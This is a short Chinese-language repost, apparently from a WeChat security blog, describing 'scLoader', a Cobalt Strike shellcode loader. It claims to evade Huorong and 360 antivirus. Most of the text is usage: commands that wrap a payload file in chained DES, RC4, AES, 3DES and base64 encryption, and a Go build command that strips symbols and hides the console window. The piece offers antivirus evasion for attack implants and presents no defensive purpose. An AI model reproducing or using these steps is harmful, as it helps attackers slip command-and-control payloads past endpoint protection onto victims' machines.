目前测试了火绒和360,静态动态都能免杀,静态VT检测效果一般。
#.bin文件
.sparrow.exe -e des,rc4,aes,3des,base64 -f .payload.bin
#.c文件
.sparrow.exe -e des,rc4,aes,3des,base64 -f .payload.c
注意:-e参数必须使用base64编码结尾
go build -trimpath -ldflags="-w -s -H=windowsgui" ./loader/loader.go
好文推荐
原文始发于微信公众号(系统安全运维):CS shellcode 加载器 -- scLoader
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论